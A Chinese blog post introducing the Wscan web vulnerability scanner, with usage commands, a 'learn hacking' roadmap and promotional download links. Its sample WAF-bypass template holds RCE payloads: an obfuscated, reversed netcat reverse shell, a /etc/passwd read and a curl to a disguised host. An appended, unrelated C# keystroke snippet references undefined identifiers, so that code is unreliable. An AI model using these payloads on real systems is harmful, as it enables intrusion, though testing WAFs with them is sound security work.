WScan一款专注于WEB安全的扫描器工具-漏洞扫描

302 篇文章 1 订阅
301 篇文章 1 订阅

0x01 工具介绍

    Wscan是一款专注于WEB安全的扫描器,它向Nmap致敬,而Nmap已经开源25年了。我们也计划在未来25年内持续更新Wscan,并将其持续开源。我们欢迎所有对web安全感兴趣的人一起加入我们的开发团队。我们的目标是开发一款使用机器学习进行渗透测试的工具。与其他工具不同的是,我们的工具可以自动学习攻击和防御的模式,并根据具体的目标进行个性化的攻击。这样一来,我们的攻击效率和准确性将大大提高,同时也能降低误判的概率。我们的工具采用了机器学习技术,实现了全自动化的Web渗透测试。这意味着无需手动添加和更新规则和签名,它能够自动学习和适应新的攻击模式和漏洞。机器学习技术还能够快速处理大量的数据和流量,从而大幅提高测试效率和准确性。此外,它能够识别和发现一些人工难以察觉的漏洞和弱点,从而改善测试质量和可靠性。我们相信,使用机器学习技术进行渗透测试,将是未来网络安全的一个重要方向。我们希望我们的工具能够帮助更多的人保障网络安全,为网络安全事业做出贡献。

下载地址在末尾

0x02 功能简介

架构简析

开源时间表

    Wscan的目标是创建一个开源且非盈利的项目。然而,由于Wscan的工作量庞大,代码仍在快速迭代中。过早地进行开源可能导致各种各样的魔改版本涌现,这对工具的传播和项目未来的发展并不利。因此,计划以Stars作为考量指标,分阶段分模块进行开源,以确保项目的稳健性和社区的有序参与。
YAML POC扫描模块 (Stars > 400 开源)``反连模块 (Stars > 400 开源)``对内置的Payload不满意,自定义WAF绕过WEB通用漏洞检测模板 (特色功能)(Stars > 400 开源)``SQL注入模块 (Stars > 500 开源)``动态爬虫 (Stars > 600 开源)``目录扫描模块 (Stars > 700 开源)``基线扫描 (Stars > 800 开源)``基于消息订阅的插件调度模块 (Stars > 900 开源)``HTTP参数形变模块, 传统扫描模块全部开源, 可自行修改编译构建扫描器 (Stars > 1k 开源)``机器学习降低误报模块 (Stars > 3k 开源)``机器学习自动生成Paylaod模块 (Stars > 4k 开源)

0x03更新介绍

2023.11.05 发布v1.0.0 二进制版,支持简单的Web通用漏洞检测``2023.11.12 发布v1.0.1 二进制版,静态爬虫``2023.11.12 发布v1.0.2 二进制版,支持被动扫描``2023.11.19 发布v1.0.3 二进制版,支持JSONP插件``2023.11.26 发布v1.0.4 二进制版,修复XSS、SQL注入漏报的问题,支持对单个URL进行漏洞检测``2023.11.30 发布v1.0.5 二进制版,支持浏览器爬虫、支持URL、表单智能过滤``2023.12.02 发布v1.0.6 二进制版,支持输出JSON、HTML格式的扫描结果``2023.12.03 发布v1.0.7 二进制版,支持Yaml POC扫描插件``2023.12.04 发布v1.0.8 二进制版,支持通过命令行指定要启用的plugins``2023.12.09 发布v1.0.9 二进制版,支持自定义WEB通用漏洞扫描模板(Waf绕过/Waf测试)``2023.12.12 发布v1.0.10 二进制版,目录扫描内置400条常见规则、支持自定义扫描路径爆破。支持ASP、PHP通用命令执行检测``2023.12.24 发布v1.0.11 二进制版,支持独立部署反连模块,同时Yaml POC支持反连功能``2023.12.30 发布v1.0.12 二进制版,支持Goby JSON POC插件,多层URL目录POC扫描``2024.01.07 发布v1.0.13 二进制版,支持XXE、SSRF、Fastjson、 Struts2系列漏洞批量检测

0x04 使用介绍

(1) 主动扫描``./wscan  --log-level=debug ws --basic-crawler http://testphp.vulnweb.com/ --json-output=wscan_scan_result.json --html-output=wscan_scan_result.html``./wscan  --log-level=debug ws --browser  http://testphp.vulnweb.com/ --html-output=wscan_scan_result.html``./wscan  --log-level=debug ws --url http://testphp.vulnweb.com/listproducts.php?cat=1  --json-output=wscan_scan_result.json``./wscan  --log-level=debug ws --url-file=/wscan/url_file.txt --html-output=wscan_scan_result.html``./wscan  --log-level=debug ws --poc=/your_wscan_poc/wscan-poc/pocs/* --url http://testphp.vulnweb.com/ --html-output=wscan_scan_result.html``(2) 被动扫描``./wscan  --log-level=debug ws --listen=127.0.0.1:1000 --json-output=wscan_scan_result.json`  `(3) POC扫描`    `3.1 POC下载地址 https://github.com/chushuai/wscan-poc/releases`    `3.2 Wscan首次运行时,将会生成一个名为config.yaml的文件。您需要修改该文件中的以下内容,以指定include_poc的路径。`        `prometheus:`            `enabled: true`            `depth: 1`            `auto_load_poc: false`            `include_poc:`                `- C:\wscan_windows_amd64.exe\wscan-poc-1.0.0\pocs\*.yml`            `exclude_poc: []``    3.3 通过命令行启用--plug=prometheus,并且指定--url-file(一行一个url)绝对路径,即可进行大范围POC检测`        `./wscan --log-level=debug ws --plug=prometheus  --url-file=/url_file.txt  --html-output=wscan_scan_result.html``(4) 自定义WEB通用漏洞扫描模板(Waf绕过/Waf测试)`    `4.1 不同于POC测试,自定义WEB通用漏洞扫描插件,会对指定位置的参数进行FUZZ,`        `样例参考 https://github.com/chushuai/wscan/tree/main/core/plugins/custom_tmpl/tmpl/owasp`        `插件样例`        `---`        `payload:`          `- $(printf 'hsab/nib/ e- 4321 1.0.0.721 cn'|rev)`          `- /etc/passwd`          ``- "`curl -L http://\u24BC\u24C4\u24C4\u24BC\u24C1\u24BA.\u24B8\u24C4\u24C2`"``        `encoder:`          `- URL`        `placeholder:`          `- URLParam`          `- HTMLForm`          `- HTMLMultipartForm`          `- JSONRequest`        `type: "RCE"`        `...`    `4.2 您需要修改config.yaml文件中的以下内容,以指定include_tmpl的路径。`        `enabled: true`        `depth: 0`        `auto_load_tmpl: false``        include_tmpl:`          `- /wscan/core/plugins/custom_tmpl/tmpl/owasp/*.yml`        `exclude_tmpl: [ ]`        `block_status_codes: # 被WAF阻止时HTTP状态码列表,默认值为403`          `- 403`        `pass_status_codes: # 未被WAF阻止时HTTP状态码列表, 默认值为200或404`          `- 200`          `- 404`        `block_regex: "" # 被WAF阻止网页的正则表达式`        `pass_regex: "" # 未被WAF阻止网页的正则表达式`        `non_blocked_as_passed: false`    `4.3 通过命令行启用--plug=custom_tmpl,即可对目标网站进行自定义Payload测试。`        `./wscan --log-level=debug ws --plug=custom_tmpl  --browser  http://testphp.vulnweb.com/  --html-output=wscan_scan_result.html``(5) 独立部署反连模块``./wscan  reverse

生成报告模板

关于我

笔者本人 17 年就读于一所普通的本科学校,20 年 6 月在三年经验的时候顺利通过校招实习面试进入大厂,现就职于某大厂安全联合实验室。

如何自学黑客&网络安全

黑客零基础入门学习路线&规划

初级黑客
1、网络安全理论知识(2天)
①了解行业相关背景,前景,确定发展方向。
②学习网络安全相关法律法规。
③网络安全运营的概念。
④等保简介、等保规定、流程和规范。(非常重要)

2、渗透测试基础(一周)
①渗透测试的流程、分类、标准
②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking
③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察
④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等

3、操作系统基础(一周)
①Windows系统常见功能和命令
②Kali Linux系统常见功能和命令
③操作系统安全(系统入侵排查/系统加固基础)

4、计算机网络基础(一周)
①计算机网络基础、协议和架构
②网络通信原理、OSI模型、数据转发流程
③常见协议解析(HTTP、TCP/IP、ARP等)
④网络攻击技术与网络安全防御技术
⑤Web漏洞原理与防御:主动/被动攻击、DDOS攻击、CVE漏洞复现

5、数据库基础操作(2天)
①数据库基础
②SQL语言基础
③数据库安全加固

6、Web渗透(1周)
①HTML、CSS和JavaScript简介
②OWASP Top10
③Web漏洞扫描工具
④Web渗透工具:Nmap、BurpSuite、SQLMap、其他(菜刀、漏扫等)

感兴趣的可以访问我的往期文章:
VMware17.0安装教程【附安装包】

Nessus工具安装激活教程,三分钟手把手教会,非常简单
漏洞扫描工具AWVS介绍及安装教程
【2023最新版】超详细Burp Suite安装保姆级教程,Burp Suite的基本介绍及使用,收藏这一篇就够了

恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;如果等保模块学的好,还可以从事等保工程师。薪资区间6k-15k

到此为止,大概1个月的时间。你已经成为了一名“脚本小子”。那么你还想往下探索吗?

如果你想要入坑黑客&网络安全,笔者给大家准备了一份:282G全网最全的网络安全资料包需要保存下方图片,微信扫码即可前往获取!

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

[2024最新CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享]

7、脚本编程(初级/中级/高级)
在网络安全领域。是否具备编程能力是“脚本小子”和真正黑客的本质区别。在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。在分秒必争的CTF竞赛中,想要高效地使用自制的脚本工具来实现各种目的,更是需要拥有编程能力.

如果你零基础入门,笔者建议选择脚本语言Python/PHP/Go/Java中的一种,对常用库进行编程学习;搭建开发环境和选择IDE,PHP环境推荐Wamp和XAMPP, IDE强烈推荐Sublime;·Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;·用Python编写漏洞的exp,然后写一个简单的网络爬虫;·PHP基本语法学习并书写一个简单的博客系统;熟悉MVC架构,并试着学习一个PHP框架或者Python框架 (可选);·了解Bootstrap的布局或者CSS。

8、超级黑客
这部分内容对零基础的同学来说还比较遥远,就不展开细说了,附上学习路线。

网络安全工程师企业级学习路线

攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去就业和接私活完全没有问题。

视频配套资料&国内外网安书籍、文档&工具

当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。

一些笔者自己买的、其他平台白嫖不到的视频教程。

如果你想要入坑黑客&网络安全,笔者给大家准备了一份:282G全网最全的网络安全资料包免费领取!

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

[2024最新CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享]

工具包、面试题和源码

“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等,感兴趣的同学不容错过。

还有我视频里讲的案例源码和对应的工具包,需要的话也可以拿走。

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

[2024最新CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享]

最后就是我这几年整理的网安方面的面试题,如果你是要找网安方面的工作,它们绝对能帮你大忙。

这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的,如果大家有好的题目或者好的见解欢迎分享。

参考解析:深信服官网、奇安信官网、Freebuf、csdn等

内容特点:条理清晰,含图像化表示更加易懂。

内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

[2024最新CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享]

结语

网络安全产业就像一个江湖,各色人等聚集。相对于欧美国家基础扎实(懂加密、会防护、能挖洞、擅工程)的众多名门正派,我国的人才更多的属于旁门左道(很多白帽子可能会不服气),因此在未来的人才培养和建设上,需要调整结构,鼓励更多的人去做“正向”的、结合“业务”与“数据”、“自动化”的“体系、建设”,才能解人才之渴,真正的为社会全面互联网化提供安全保障。

特别声明:

此教程为纯技术分享!本教程的目的决不是为那些怀有不良动机的人提供及技术支持!也不承担因为技术被滥用所产生的连带责任!本教程的目的在于最大限度地唤醒大家对网络安全的重视,并采取相应的安全措施,从而减少由网络安全而带来的经济损失。!!!

  • 31
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
要实现将扫描到窗体组件中的条码发送到另一个测试软件条码框中,可以通过以下步骤实现: 1. 在C#中,使用Barcode Scanner控件来扫描条码。在扫描完成后,可以通过Barcode Scanner控件的事件来获取扫描结果。 2. 获取扫描结果后,可以使用Windows API来模拟键盘输入。具体来说,可以使用SendInput函数来发送模拟键盘输入消息。 3. 找到测试软件的条码框句柄,使用Windows API来将模拟键盘输入消息发送到测试软件的条码框中。可以使用FindWindow函数和SendMessage函数来实现这一步。 以下是一个示例代码: ```csharp [DllImport("user32.dll")] public static extern bool SendMessage(IntPtr hWnd, int Msg, int wParam, int lParam); [DllImport("user32.dll")] public static extern IntPtr FindWindow(string lpClassName, string lpWindowName); [DllImport("user32.dll")] public static extern void keybd_event(byte bVk, byte bScan, uint dwFlags, uint dwExtraInfo); [DllImport("user32.dll")] static extern uint MapVirtualKey(uint uCode, uint uMapType); [DllImport("user32.dll", SetLastError = true)] static extern uint SendInput(uint nInputs, [MarshalAs(UnmanagedType.LPArray), In] INPUT[] pInputs, int cbSize); private const int WM_SETTEXT = 0x000C; private const int KEY_UP = 0x0002; private const int KEY_DOWN = 0x0000; private const int VK_RETURN = 0x0D; public void SendBarcodeToTestSoftware(string barcode) { // 模拟按下并释放回车键 keybd_event(VK_RETURN, (byte)MapVirtualKey(VK_RETURN, 0), KEY_DOWN, 0); keybd_event(VK_RETURN, (byte)MapVirtualKey(VK_RETURN, 0), KEY_UP, 0); // 获取测试软件条码框句柄 IntPtr hwnd = FindWindow(null, "测试软件窗口标题"); if (hwnd == IntPtr.Zero) { MessageBox.Show("未找到测试软件窗口"); return; } // 将焦点设置到测试软件条码框 SendMessage(hwnd, WM_SETFOCUS, 0, 0); // 将扫描到的条码发送到测试软件条码框中 foreach (char c in barcode) { INPUT[] inputs = new INPUT[2]; inputs[0] = new INPUT(); inputs[0].type = 1; inputs[0].ki.wVk = 0; inputs[0].ki.wScan = (ushort)c; inputs[0].ki.dwFlags = KEYEVENTF.UNICODE; inputs[0].ki.time = 0; inputs[0].ki.dwExtraInfo = IntPtr.Zero; inputs[1] = new INPUT(); inputs[1].type = 1; inputs[1].ki.wVk = 0; inputs[1].ki.wScan = (ushort)c; inputs[1].ki.dwFlags = KEYEVENTF.KEYUP | KEYEVENTF.UNICODE; inputs[1].ki.time = 0; inputs[1].ki.dwExtraInfo = IntPtr.Zero; SendInput(2, inputs, Marshal.SizeOf(typeof(INPUT))); } } // 定义INPUT结构体 [StructLayout(LayoutKind.Sequential)] public struct INPUT { public uint type; public InputUnion U; public static int Size { get { return Marshal.SizeOf(typeof(INPUT)); } } } // 定义InputUnion结构体 [StructLayout(LayoutKind.Explicit)] public struct InputUnion { [FieldOffset(0)] public MOUSEINPUT mi; [FieldOffset(0)] public KEYBDINPUT ki; [FieldOffset(0)] public HARDWAREINPUT hi; } // 定义MOUSEINPUT结构体 [StructLayout(LayoutKind.Sequential)] public struct MOUSEINPUT { public int dx; public int dy; public uint mouseData; public uint dwFlags; public uint time; public IntPtr dwExtraInfo; } // 定义KEYBDINPUT结构体 [StructLayout(LayoutKind.Sequential)] public struct KEYBDINPUT { public ushort wVk; public ushort wScan; public uint dwFlags; public uint time; public IntPtr dwExtraInfo; } // 定义HARDWAREINPUT结构体 [StructLayout(LayoutKind.Sequential)] public struct HARDWAREINPUT { public uint uMsg; public ushort wParamL; public ushort wParamH; } ``` 请注意,此示例仅供参考,具体实现可能需要根据实际情况进行调整。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值